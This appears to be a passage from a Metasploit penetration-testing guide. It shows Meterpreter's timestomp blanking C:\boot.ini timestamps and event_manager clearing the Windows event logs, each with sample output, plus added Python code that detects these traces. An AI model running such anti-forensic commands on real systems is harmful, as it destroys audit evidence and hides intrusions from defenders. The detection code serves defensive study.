Simulated Penetration Test
OPTIONS:
-a <opt> Set the "last accessed" time of the file
-b Set the MACE timestamps so that EnCase shows blanks
-c <opt> Set the "creation" time of the file
-e <opt> Set the "mft entry modified" time of the file
-f <opt> Set the MACE of attributes equal to the supplied file
-h Help banner
-m <opt> Set the "last written" time of the file
-r Set the MACE timestamps recursively on a directory
-v Display the UTC MACE values of the file
-z <opt> Set all four attributes (MACE) of the file
meterpreter > timestomp C:\\boot.ini -b
[*] Blanking file MACE attributes on C:\boot.ini
meterpreter >
In this example, we blanked the file's MACE timestamps so that when EnCase (a popular forensic analysis tool) examines the file, the timestamp fields are empty.
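From the defender's side, a blanked or rewritten timestamp is itself an artifact. The following Python example, added here and not part of the book or of Metasploit, runs three common checks over a set of constructed MFT records: all-zero MACE values (modelled here as what the blanking option leaves behind, which viewers show as empty or as 1601-01-01), $STANDARD_INFORMATION times with no sub-second component (a time supplied as a date string carries none), and a $STANDARD_INFORMATION creation time earlier than the $FILE_NAME creation time, which the public file-time API cannot produce. The record layout and the sample paths other than C:\boot.ini are assumptions.

```python
"""Spot tampered NTFS MACE timestamps (added example, not from the page)."""
from datetime import datetime, timedelta, timezone

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
TICKS_PER_SECOND = 10_000_000  # a FILETIME counts 100-nanosecond intervals


def datetime_to_filetime(dt):
    """UTC datetime -> 64-bit FILETIME, integer arithmetic only."""
    delta = dt - FILETIME_EPOCH
    return (delta.days * 86400 + delta.seconds) * TICKS_PER_SECOND + delta.microseconds * 10


def filetime_to_datetime(ft):
    """FILETIME -> UTC datetime (microsecond resolution); 0 maps to 1601-01-01."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def inspect_record(rec):
    """Return a list of anomaly codes for one file's MFT timestamps.

    rec["si"] holds the $STANDARD_INFORMATION M/A/C/E values and rec["fn"]
    the $FILE_NAME values, each as FILETIME integers keyed 'm','a','c','e'.
    """
    si, fn = rec["si"], rec["fn"]
    findings = []
    # All-zero MACE: modelled here as what blanking leaves behind; viewers
    # show these fields as empty or as 1601-01-01 (assumption).
    if all(v == 0 for v in si.values()):
        return ["zeroed_mace"]
    # A time written from a human-readable date string has no fraction of a
    # second; genuine NTFS timestamps almost always do.
    if all(v % TICKS_PER_SECOND == 0 for v in si.values()):
        findings.append("no_subsecond_precision")
    # SetFileTime only touches $STANDARD_INFORMATION, so a creation time that
    # predates the $FILE_NAME creation time indicates backdating.
    if si["c"] < fn["c"]:
        findings.append("si_before_fn")
    return findings


def analyze(records):
    """Map each path to its list of anomaly codes (empty list = clean)."""
    return {rec["path"]: inspect_record(rec) for rec in records}


def _ft(*args):
    return datetime_to_filetime(datetime(*args, tzinfo=timezone.utc))


def _mace(*args):
    """Build an M/A/C/E dict with all four values equal (test data helper)."""
    value = _ft(*args)
    return {key: value for key in "mace"}


# Constructed sample MFT entries (not real forensic data).
SAMPLE_RECORDS = [
    {   # untouched file: sub-second precision present, SI and FN agree
        "path": r"C:\Windows\notepad.exe",
        "si": _mace(2009, 7, 14, 1, 39, 12, 456789),
        "fn": _mace(2009, 7, 14, 1, 39, 12, 456789),
    },
    {   # blanked MACE, the state the page leaves C:\boot.ini in
        "path": r"C:\boot.ini",
        "si": {"m": 0, "a": 0, "c": 0, "e": 0},
        "fn": _mace(2012, 3, 9, 8, 15, 44, 201200),
    },
    {   # backdated: SI set to a round 2005 date, FN still records 2012 creation
        "path": r"C:\Windows\Temp\svc.dll",
        "si": _mace(2005, 1, 1, 0, 0, 0),
        "fn": _mace(2012, 3, 9, 8, 16, 2, 777010),
    },
]

if __name__ == "__main__":
    for path, codes in analyze(SAMPLE_RECORDS).items():
        print(f"{path}: {', '.join(codes) if codes else 'no anomalies'}")
```

On a live system the $FILE_NAME values come from the MFT itself (a raw parser or a tool that exports both attribute sets), not from the normal file API; the checks above are the same whichever source fills in the records.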
The tool event_manager will modify event logs so that they don’t show any information that might reveal that an attack occurred. Here it is in action:
meterpreter > run event_manager
Meterpreter Script for Windows Event Log Query and Clear.
OPTIONS:
-c <opt> Clear a given Event Log (or ALL if no argument specified)
-f <opt> Event ID to filter events on
-h Help menu
-i Show information about Event Logs on the System and their configuration
-l <opt> List a given Event Log.
-p Supress printing filtered logs to screen
-s <opt> Save logs to local CSV file, optionally specify alternate folder in which to save logs
meterpreter > run event_manager -c
[-] You must specify an eventlog to query!
[*] Application:
[*] Clearing Application
[*] Event Log Application Cleared!
[*] MailCarrier 2.0:
[*] Clearing MailCarrier 2.0
[*] Event Log MailCarrier 2.0 Cleared!
[*] Security:
[*] Clearing Security
[*] Event Log Security Cleared!
[*] System:
[*] Clearing System
[*] Event Log System Cleared!
meterpreter >
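Clearing a log is not silent: Windows writes a marker into the fresh log (Event ID 1102 in Security on Vista and later, 517 on XP and Server 2003, and Event ID 104 in System for the other logs), and a log whose oldest record is newer than expected has lost history even if the marker is gone. The Python example below, added here and not part of the book or of Metasploit, parses a constructed CSV export of event records, lists the clear markers, and reports each log's oldest surviving record. The CSV column layout, timestamps and messages are assumptions made for the sample, not event_manager's own -s format.

```python
"""Find log-clearing markers in exported Windows event records (added example)."""
import csv
import io

# Event IDs Windows writes when a log is cleared:
#   Security 1102  "The audit log was cleared" (Vista and later)
#   Security 517   the same marker on Windows XP / Server 2003
#   System   104   "The <name> log file was cleared" for the other logs
CLEAR_MARKERS = {("Security", 1102), ("Security", 517), ("System", 104)}

# Constructed sample export: the state after Application, MailCarrier 2.0,
# Security and System were cleared in that order. Clearing System last
# wiped the 104 markers for the first two logs; only Security's 1102 and
# System's own 104 survive.
SAMPLE_CSV = """\
LogName,TimeCreated,EventId,ProviderName,Message
System,2024-05-01T10:02:14Z,104,Microsoft-Windows-Eventlog,The System log file was cleared.
Security,2024-05-01T10:02:13Z,1102,Microsoft-Windows-Eventlog,The audit log was cleared.
Application,2024-05-01T10:05:02Z,1000,Application Error,Faulting application name: example.exe
Security,2024-05-01T10:03:40Z,4624,Microsoft-Windows-Security-Auditing,An account was successfully logged on.
System,2024-05-01T10:06:00Z,7036,Service Control Manager,The Print Spooler service entered the running state.
"""


def parse_events(text):
    """Read CSV rows into dicts, converting EventId to int."""
    events = []
    for row in csv.DictReader(io.StringIO(text)):
        row["EventId"] = int(row["EventId"])
        events.append(row)
    return events


def find_clearing_events(events):
    """Return (log, time, id, message) for every clear marker, oldest first."""
    hits = [(e["LogName"], e["TimeCreated"], e["EventId"], e["Message"])
            for e in events if (e["LogName"], e["EventId"]) in CLEAR_MARKERS]
    return sorted(hits, key=lambda h: h[1])   # ISO-8601 strings sort chronologically


def earliest_record(events):
    """Oldest surviving record per log as (time, id); a marker here means the
    whole prior history of that log is gone."""
    earliest = {}
    for e in sorted(events, key=lambda e: e["TimeCreated"]):
        earliest.setdefault(e["LogName"], (e["TimeCreated"], e["EventId"]))
    return earliest


def history_gaps(events, expected_start):
    """Logs whose oldest record is newer than expected_start (ISO-8601 string).

    This catches logs such as Application in the sample, where the clear
    marker itself was destroyed but the history is still missing.
    """
    return sorted(log for log, (time, _) in earliest_record(events).items()
                  if time > expected_start)


SAMPLE_EVENTS = parse_events(SAMPLE_CSV)

if __name__ == "__main__":
    for log, time, event_id, message in find_clearing_events(SAMPLE_EVENTS):
        print(f"{time} {log} {event_id}: {message}")
    for log in history_gaps(SAMPLE_EVENTS, "2024-04-01T00:00:00Z"):
        print(f"{log}: no records before the expected retention start")
```

The expected_start argument is whatever retention the environment normally provides (the oldest record the log held at the last known-good check); forwarding logs to a collector keeps a copy that a local clear cannot reach.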